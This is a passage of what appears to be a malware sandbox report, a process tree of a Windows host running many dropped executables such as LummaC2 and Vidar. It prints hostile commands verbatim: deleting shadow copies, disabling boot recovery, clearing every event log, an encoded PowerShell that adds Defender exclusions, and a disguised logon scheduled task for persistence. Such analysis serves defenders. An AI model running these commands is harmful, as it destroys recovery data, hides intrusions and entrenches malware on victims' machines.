      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete /nointeractive
        6⤵
        
        PID:5036
    - - C:\Windows\system32\cmd.exe
        
        cmd /c vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        
        PID:3440
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        6⤵
        Interacts with shadow copies
        
        PID:4124
    - - C:\Windows\system32\cmd.exe
        
        cmd /c bcdedit /set {default} recoveryenabled No
        5⤵
        
        PID:3596
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:4360
    - - C:\Windows\system32\cmd.exe
        
        cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        
        PID:5284
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:6080
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        5⤵
        
        PID:3188
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4388
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1_ENCO~1.EXE"
    3⤵
    PID:3348
  - - C:\Users\Admin\AppData\Local\Temp\Files\1_ENCO~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\1_ENCO~1.EXE
      4⤵
      PID:5296
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\WWBIZS~1.EXE"
    3⤵
    PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\Files\WWBIZS~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\WWBIZS~1.EXE
      4⤵
      PID:6496
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\LUMMAC~1.EXE"
    3⤵
    PID:6188
  - - C:\Users\Admin\AppData\Local\Temp\Files\LUMMAC~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\LUMMAC~1.EXE
      4⤵
      PID:6380
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe"
    3⤵
    PID:5808
  - - C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe
      C:\Users\Admin\AppData\Local\Temp\Files\bwapp.exe
      4⤵
      PID:1720
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
    3⤵
    PID:4028
  - - C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
      C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
      4⤵
      PID:4328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5368
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5248
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2864
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jdkashk.exe"
    3⤵
    PID:5332
  - - C:\Users\Admin\AppData\Local\Temp\Files\jdkashk.exe
      C:\Users\Admin\AppData\Local\Temp\Files\jdkashk.exe
      4⤵
      PID:6776
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\service.exe"
    3⤵
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\Files\service.exe
      C:\Users\Admin\AppData\Local\Temp\Files\service.exe
      4⤵
      PID:6840
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe"
    3⤵
    PID:6720
  - - C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe
      C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe
      4⤵
      PID:6912
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat
        5⤵
        
        PID:2764
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c copy Treat Treat.bat & Treat.bat
        6⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4992
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        
        PID:5000
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"
    3⤵
    PID:6824
  - - C:\Users\Admin\AppData\Local\Temp\Files\msf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\msf.exe
      4⤵
      PID:6900
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
    3⤵
    PID:5584
  - - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
      C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
      4⤵
      PID:2788
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PROTOT~1.EXE"
    3⤵
    PID:6536
  - - C:\Users\Admin\AppData\Local\Temp\Files\PROTOT~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\PROTOT~1.EXE
      4⤵
      PID:2416
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\KEEPVI~1.EXE"
    3⤵
    PID:5128
  - - C:\Users\Admin\AppData\Local\Temp\Files\KEEPVI~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\KEEPVI~1.EXE
      4⤵
      PID:7148
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DKASJH~1.EXE"
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\Files\DKASJH~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\DKASJH~1.EXE
      4⤵
      PID:7160
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
    3⤵
    PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
      C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
      4⤵
      PID:2096
    - - C:\Windows\sysmablsvr.exe
        
        C:\Windows\sysmablsvr.exe
        5⤵
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\680333432.exe
        
        C:\Users\Admin\AppData\Local\Temp\680333432.exe
        6⤵
        
        PID:604
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        8⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        9⤵
        Modifies registry key
        
        PID:9060
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:8964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
        8⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn Windows Upgrade Manager
        9⤵
        
        PID:8092
      - C:\Users\Admin\AppData\Local\Temp\1023726390.exe
        
        C:\Users\Admin\AppData\Local\Temp\1023726390.exe
        6⤵
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\1653731166.exe
        
        C:\Users\Admin\AppData\Local\Temp\1653731166.exe
        6⤵
        
        PID:6352
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Charter.exe"
    3⤵
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\Files\Charter.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Charter.exe
      4⤵
      PID:4372
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"
    3⤵
    PID:7124
  - - C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
      C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
      4⤵
      PID:6892
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\OPDXDY~1.EXE"
    3⤵
    PID:5248
  - - C:\Users\Admin\AppData\Local\Temp\Files\OPDXDY~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\OPDXDY~1.EXE
      4⤵
      PID:6564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=
        5⤵
        
        PID:5988
    - - C:\Users\Admin\AppData\Local\Temp\Files\OPDXDY~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\OPDXDY~1.EXE"
        5⤵
        
        PID:4196
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe"
    3⤵
    PID:7596
  - - C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe
      C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe
      4⤵
      PID:7692
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MEETIN~1.EXE"
    3⤵
    PID:7332
  - - C:\Users\Admin\AppData\Local\Temp\Files\MEETIN~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\MEETIN~1.EXE
      4⤵
      PID:7544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:916
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3096
- - C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
    3⤵
    PID:2600
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE"
    3⤵
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE
      4⤵
      PID:3172
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
    3⤵
    PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
      C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
      4⤵
      PID:3292
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
    3⤵
    PID:3116
  - - C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
      C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
      4⤵
      PID:3832
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\key.exe"
    3⤵
    PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\Files\key.exe
      C:\Users\Admin\AppData\Local\Temp\Files\key.exe
      4⤵
      PID:5132
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 128
        5⤵
        Program crash
        
        PID:3596
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Vidar.exe"
    3⤵
    PID:3684
  - - C:\Users\Admin\AppData\Local\Temp\Files\Vidar.exe
      C:\Users\Admin\AppData\Local\Temp\Files\Vidar.exe
      4⤵
      PID:4548
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2756
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6512
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5556
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5808
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5724
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2624
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3500
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2084
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1768
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:7096
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6684
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4356
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6904
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2788
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6756
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3448
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3760
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5308
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:7020
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5056
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5200
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5728
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5664
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2796
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4928
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3600
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4132
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:7016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6012
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:868
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5488
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2224
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2440
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3364
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4684
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2416
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6820
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3224
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4956
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6008
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2592
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5496
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2064
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5332
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5404
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2528
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4156
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:6052
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3952
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4296
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:1380
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4820
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4108
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4052
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3888
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2784
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5628
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3308
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4512
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:4012
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:5232
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:3584
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        5⤵
        
        PID:2208
